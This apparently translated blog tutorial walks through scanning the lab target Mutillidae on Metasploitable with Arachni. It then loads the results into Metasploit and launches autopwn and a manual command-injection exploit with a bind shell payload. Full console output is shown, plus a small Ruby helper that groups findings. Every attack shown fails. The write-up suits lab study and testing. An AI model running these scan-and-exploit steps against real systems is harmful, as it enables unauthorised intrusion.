
WebApp exploitation with Arachni and Metasploit

<a href="http://www.milsec.net/metasploit%E5%BA%94%E7%94%A8/41.html">http://www.milsec.net/metasploit%e5%ba%94%e7%94%a8/41.html</a>

Arachni, as an open-source scanner, deserves praise for its efficiency and accuracy in spotting web script vulnerabilities. Being a mainstream open-source scanner it naturally follows the trend and works very well together with Metasploit: through an msf plugin it plugs into Metasploit seamlessly.

Today we demonstrate using Arachni together with Metasploit to scan, test and break into a website. My test environment is:

metasploitable + backbox + arachni + metasploit

First we scan the target with Arachni; the screenshot speaks for itself, so I won't belabour it:

[Screenshot: http://www.milsec.net/wp-content/uploads/2013/09/arachni.jpg]

<pre><code>root@metasploit:/home/exploit/Desktop# arachni http://192.168.1.35/mutillidae/ --report=metareport:outfile=localhost.afr.msf
WARNING: gnome-keyring:: couldn't connect to: /tmp/keyring-avqGQf/pkcs11: No such file or directory
Arachni - Web Application Security Scanner Framework v0.4.2
       Author: Tasos "Zapotek" Laskos

               (With the support of the community and the Arachni Team.)

       Website:       http://arachni-scanner.com
       Documentation: http://arachni-scanner.com/wiki

 [~] No modules were specified.
 [~]    -&gt; Will run all mods.
 [~] No audit options were specified.
 [~]    -&gt; Will audit links, forms and cookies.
</code></pre>

After the scan, the scan log is saved in msf format so that Metasploit can load it.

To bring Arachni's plugin into Metasploit, locate the Arachni directory and copy external/metasploit into the Metasploit root directory:

<code>cp -R arachni/external/metasploit/* metasploit/</code>

Then run Metasploit and load the Arachni plugin, as shown below:

[Screenshot: http://www.milsec.net/wp-content/uploads/2013/09/metasploit.jpg]

<pre><code>root@metasploit:~# msfconsole
[!] Warning: This tool is located in /opt/backbox/msf
[i] Remember to give the full absolute path when specifying a file

# cowsay++
 ____________
&lt; metasploit &gt;
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v4.8.0-dev [core:4.8 api:1.0]
+ -- --=[ 1168 exploits - 641 auxiliary - 186 post
+ -- --=[ 312 payloads - 30 encoders - 8 nops

msf &gt; load arachni
[+] Added 1 Auxiliary modules for Arachni
[+] Added 4 Exploit modules for Arachni
[*] Successfully loaded plugin: arachni
msf &gt; arachni_load /root/localhost.afr.msf
[*] Loading report...
[*] Loaded 21 vulnerabilities.

Unique exploits
===============

ID  Exploit                   Description
--  -------                   -----------
1   auxiliary/arachni_sqlmap
</code></pre>

Let's look at Arachni's auto-attack parameters:

<pre><code>msf &gt; arachni_autopwn
[*] Usage: arachni_autopwn [options]
    -h           Display this help text
    -x [regexp]  Only run modules whose name matches the regex
    -a           Launch exploits against all matched targets
    -r           Use a reverse connect shell
    -b           Use a bind shell on a random port (default)
    -m           Use a meterpreter shell (if possible)
    -q           Disable exploit module output
</code></pre>

We choose to launch every matched exploit:

[Screenshot: http://www.milsec.net/wp-content/uploads/2013/09/arachniauto.jpg]

<pre><code>msf &gt; arachni_autopwn -a
[*] Running pwn-jobs...
[*] [0 established sessions]): Waiting on 21 launched modules to finish execution...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] [0 established sessions]): Waiting on 3 launched modules to finish execution...
[*] Running exploit/unix/webapp/arachni_exec
[*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Started bind handler
[*] Sending HTTP request for /mutillidae/index.php
[*] [0 established sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions
</code></pre>

Unfortunately, not a single one succeeded......

Next let's see which vulnerabilities Arachni actually found, by running the following command:

[Screenshot: http://www.milsec.net/wp-content/uploads/2013/09/arachni_vulns.jpg]

<pre><code>msf &gt; arachni_list_vulns

Vulnerabilities

ID  Host          Path                    Name                                Method  Params                                                                                                                                                                                                                      Exploit
--  ----          ----                    ----                                ------  ------                                                                                                                                                                                                                      -------
1   192.168.1.35  /mutillidae/index.php   SQL Injection                       COOKIE  {"PHPSESSID"=&gt;"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"}                                                                                                                                                          auxiliary/arachni_sqlmap
2   192.168.1.35  /mutillidae/index.php   SQL Injection                       POST    {"username"=&gt;"arachni_name", "password"=&gt;"5543!%arachni_secret", "confirm_password"=&gt;"5543!%arachni_secret", "register-php-submit-button"=&gt;"Create Account", "my_signature"=&gt;"1XXinjectionXX"}                      auxiliary/arachni_sqlmap
3   192.168.1.35  /mutillidae/index.php   SQL Injection                       POST    {"username"=&gt;"arachni_name", "password"=&gt;"5543!%arachni_secret", "confirm_password"=&gt;"5543!%arachni_secret", "register-php-submit-button"=&gt;"Create AccountXXinjectionXX", "my_signature"=&gt;"1"}                      auxiliary/arachni_sqlmap
4   192.168.1.35  /mutillidae/index.php   SQL Injection                       POST    {"username"=&gt;"arachni_name", "password"=&gt;"5543!%arachni_secret)", "confirm_password"=&gt;"5543!%arachni_secretXXinjectionXX", "register-php-submit-button"=&gt;"Create Account", "my_signature"=&gt;"1"}                     auxiliary/arachni_sqlmap
5   192.168.1.35  /mutillidae/index.php   SQL Injection                       POST    {"username"=&gt;"arachni_nameXXinjectionXX", "password"=&gt;"5543!%arachni_secret", "confirm_password"=&gt;"5543!%arachni_secret", "register-php-submit-button"=&gt;"Create Account", "my_signature"=&gt;"1"}                      auxiliary/arachni_sqlmap
6   192.168.1.35  /mutillidae/index.php   SQL Injection                       POST    {"username"=&gt;"arachni_name", "password"=&gt;"5543!%arachni_secret", "confirm_password"=&gt;"5543!%arachni_secret", "register-php-submit-button"=&gt;"Create Account", "my_signature"=&gt;"1"}                                   auxiliary/arachni_sqlmap
7   192.168.1.35  /mutillidae/index.php   SQL Injection                       COOKIE  {"showhints"=&gt;"1XXinjectionXX"}                                                                                                                                                                                          auxiliary/arachni_sqlmap
8   192.168.1.35  /mutillidae/index.php   SQL Injection                       POST    {"ToolID"=&gt;"0923ac83-8b50-4eda-ad81-f1aac6168c5cXXinjectionXX"}                                                                                                                                                         auxiliary/arachni_sqlmap
9   192.168.1.35  /mutillidae/            SQL Injection                       COOKIE  {"PHPSESSID"=&gt;"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"}                                                                                                                                                          auxiliary/arachni_sqlmap
10  192.168.1.35  /mutillidae/            SQL Injection                       COOKIE  {"showhints"=&gt;"1XXinjectionXX"}                                                                                                                                                                                          auxiliary/arachni_sqlmap
11  192.168.1.35  /mutillidae/index.php   SQL Injection                       POST    {"view-someones-blog-php-submit-button"=&gt;"View Blog EntriesXXinjectionXX", "author"=&gt;"53241E83-76EC-4920-AD6D-503DD2A6BA68"}                                                                                            auxiliary/arachni_sqlmap
12  192.168.1.35  /mutillidae/index.php   SQL Injection                       POST    {"view-someones-blog-php-submit-button"=&gt;"View Blog Entries", "author"=&gt;"53241E83-76EC-4920-AD6D-503DD2A6BA68XXinjectionXX"}                                                                                            auxiliary/arachni_sqlmap
13  192.168.1.35  /mutillidae/index.php   SQL Injection                       GET     {"page"=&gt;"user-info.php", "username"=&gt;"arachni_name", "password"=&gt;"5543!%arachni_secret", "user-info-php-submit-button"=&gt;"View Account DetailsXXinjectionXX"}                                                        auxiliary/arachni_sqlmap
14  192.168.1.35  /mutillidae/index.php   SQL Injection                       GET     {"page"=&gt;"user-info.php", "password"=&gt;"5543!%25arachni_secret", "user-info-php-submit-button"=&gt;"View+Account+Details", "username"=&gt;"arachni_nameXXinjectionXX"}                                                      auxiliary/arachni_sqlmap
15  192.168.1.35  /mutillidae/index.php   SQL Injection                       GET     {"page"=&gt;"user-info.php", "password"=&gt;"5543!%25arachni_secretXXinjectionXX", "user-info-php-submit-button"=&gt;"View+Account+Details", "username"=&gt;"arachni_name"}                                                      auxiliary/arachni_sqlmap
16  192.168.1.35  /mutillidae/index.php   SQL Injection                       GET     {"page"=&gt;"user-info.php", "password"=&gt;"5543!%25arachni_secret", "user-info-php-submit-button"=&gt;"View+Account+DetailsXXinjectionXX", "username"=&gt;"arachni_name"}                                                      auxiliary/arachni_sqlmap
17  192.168.1.35  /mutillidae/index.php   Operating system command injection  POST    {"target_host"=&gt;"XXinjectionXX", "dns-lookup-php-submit-button"=&gt;"Lookup DNS"}                                                                                                                                          unix/webapp/arachni_exec
18  192.168.1.35  /mutillidae/            Path Traversal                      GET     {"page"=&gt;"XXinjectionXX\x00.php"}                                                                                                                                                                                        unix/webapp/arachni_path_traversal
19  192.168.1.35  /mutillidae/index.php   Path Traversal                      GET     {"page"=&gt;"XXinjectionXX\x00.php", "username"=&gt;"anonymous"}                                                                                                                                                              unix/webapp/arachni_path_traversal
20  192.168.1.35  /mutillidae/index.php   Path Traversal                      GET     {"page"=&gt;"XXinjectionXX\x00.php", "choice"=&gt;"inSIDDer", "initials"=&gt;"1", "user-poll-php-submit-button"=&gt;"Submit Vote"}                                                                                               unix/webapp/arachni_path_traversal
21  192.168.1.35  /mutillidae/index.php   Path Traversal                      POST    {"page"=&gt;"source-viewer.php", "source-file-viewer-php-submit-button"=&gt;"View File", "phpfile"=&gt;"XXinjectionXX\x00.php"}                                                                                                 unix/webapp/arachni_path_traversal
</code></pre>
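The listing above is one row per injection, so the same parameter appears several times (rows 13 and 16 both hit the submit button, rows 19 and 20 both hit the page parameter). For remediation it is more useful to know the distinct input vectors, which the XXinjectionXX marker inside the Params column identifies. The Ruby below is an added triage helper written for this article, not part of Arachni or Metasploit; it parses rows in the arachni_list_vulns format and groups them by host, path, vulnerability class, method and injected parameter, using a constructed sample of seven rows trimmed from the table.

```ruby
# Added triage helper, not part of Arachni or Metasploit: parses the rows
# printed by arachni_list_vulns and groups findings by the input vector that
# was injected, so duplicate rows collapse into the parameters needing a fix.
Finding = Struct.new(:id, :host, :path, :name, :method, :param, :exploit)

MARKER = 'XXinjectionXX'   # Arachni's placeholder for the injected value
# id host path name method params exploit; the name column may contain spaces
LINE_RE = /\A(\d+)\s+(\S+)\s+(\S+)\s+(.+?)\s+(GET|POST|COOKIE|HEADER)\s+(\{.*\})\s+(\S+)\z/

def parse_finding(line)
  m = LINE_RE.match(line.strip)
  return nil unless m
  id, host, path, name, method, params, exploit = m.captures
  # Params is a Ruby hash literal; the key whose value carries MARKER is the
  # parameter Arachni injected into (the other keys are just filler values).
  injected = params.scan(/"([^"]*)"=>"([^"]*)"/).find { |_k, v| v.include?(MARKER) }
  Finding.new(id.to_i, host, path, name, method, injected && injected[0], exploit)
end

def parse_findings(text)
  text.each_line.map { |l| parse_finding(l) }.compact
end

# One remediation unit: same host, path, vulnerability class, method and parameter.
def group_by_vector(findings)
  findings.group_by { |f| [f.host, f.path, f.name, f.method, f.param] }
          .map { |(host, path, name, method, param), fs|
            { host: host, path: path, name: name, method: method,
              param: param, ids: fs.map(&:id).sort } }
end

# Constructed sample: seven rows taken from the listing above, params trimmed.
SAMPLE_ROWS = <<~'EOS'
  1 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"PHPSESSID"=>"adfea6c9XXinjectionXX"} auxiliary/arachni_sqlmap
  9 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"PHPSESSID"=>"adfea6c9XXinjectionXX"} auxiliary/arachni_sqlmap
  13 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "username"=>"arachni_name", "user-info-php-submit-button"=>"View Account DetailsXXinjectionXX"} auxiliary/arachni_sqlmap
  16 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "user-info-php-submit-button"=>"View+Account+DetailsXXinjectionXX", "username"=>"arachni_name"} auxiliary/arachni_sqlmap
  17 192.168.1.35 /mutillidae/index.php Operating system command injection POST {"target_host"=>"XXinjectionXX", "dns-lookup-php-submit-button"=>"Lookup DNS"} unix/webapp/arachni_exec
  19 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "username"=>"anonymous"} unix/webapp/arachni_path_traversal
  20 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "choice"=>"inSIDDer"} unix/webapp/arachni_path_traversal
EOS

if $PROGRAM_NAME == __FILE__
  group_by_vector(parse_findings(SAMPLE_ROWS)).each do |v|
    puts "#{v[:name]} via #{v[:method]} '#{v[:param]}' on #{v[:path]} (rows #{v[:ids].join(',')})"
  end
end
```

On the sample the seven rows collapse to five vectors; header and separator lines that do not match the row format are skipped.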

Now let yours truly, a humble hick, exploit vulnerability number 17 by hand:

[Screenshot: http://www.milsec.net/wp-content/uploads/2013/09/marachni.jpg]

<pre><code>msf &gt; arachni_manual 17
[*] Using unix/webapp/arachni_exec .
[*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
SRVHOST =&gt; 127.0.0.1
SRVPORT =&gt; 10401
RHOST =&gt; 192.168.1.35
RPORT =&gt; 80
LHOST =&gt; 127.0.0.1
LPORT =&gt; 5376
SSL =&gt; false
POST =&gt; target_host=XXinjectionXX&amp;dns-lookup-php-submit-button=Lookup DNS
METHOD =&gt; POST
COOKIES =&gt;
HEADERS =&gt; Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c
PATH =&gt; /mutillidae/index.php
[*] Done!
PAYLOAD =&gt; cmd/unix/bind_perl
msf exploit(arachni_exec) &gt;
</code></pre>

Check whether the configuration has any problems; if it doesn't, start executing.

[Screenshot: http://www.milsec.net/wp-content/uploads/2013/09/options.jpg]

<pre><code>msf exploit(arachni_exec) &gt; show options

Module options (exploit/unix/webapp/arachni_exec):

   Name     Current Setting                                                          Required  Description
   ----     ---------------                                                          --------  -----------
   COOKIES                                                                           no        Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
   GET                                                                               no        GET parameters. ('foo=bar&amp;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
   HEADERS  Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c  no  Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
   PATH     /mutillidae/index.php                                                    yes       The path to the vulnerable script.
   POST     target_host=XXinjectionXX&amp;dns-lookup-php-submit-button=Lookup DNS    no        POST parameters. ('foo=bar&amp;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
   Proxies                                                                           no        Use a proxy chain
   RHOST    192.168.1.35                                                             yes       The target address
   RPORT    80                                                                       yes       The target port
   VHOST                                                                             no        HTTP server virtual host

Payload options (cmd/unix/bind_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  5376             yes       The listen port
   RHOST  192.168.1.35     no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic
</code></pre>

Looks like it should be fine; let's run it by hand and see whether the luck I've been saving up lately is enough.

-_-!!! No luck: both attempts failed.

<pre><code>msf exploit(arachni_exec) &gt; exploit
msf exploit(arachni_exec) &gt; exploit
msf exploit(arachni_exec) &gt;
</code></pre>

Today's test environment really didn't cooperate: not a single attempt succeeded. Still, the point here was only to show everyone the process of using Arachni and Metasploit to test and break into a web application. It's just casual rambling, so experts please ignore it, and leave a comment if you have questions!!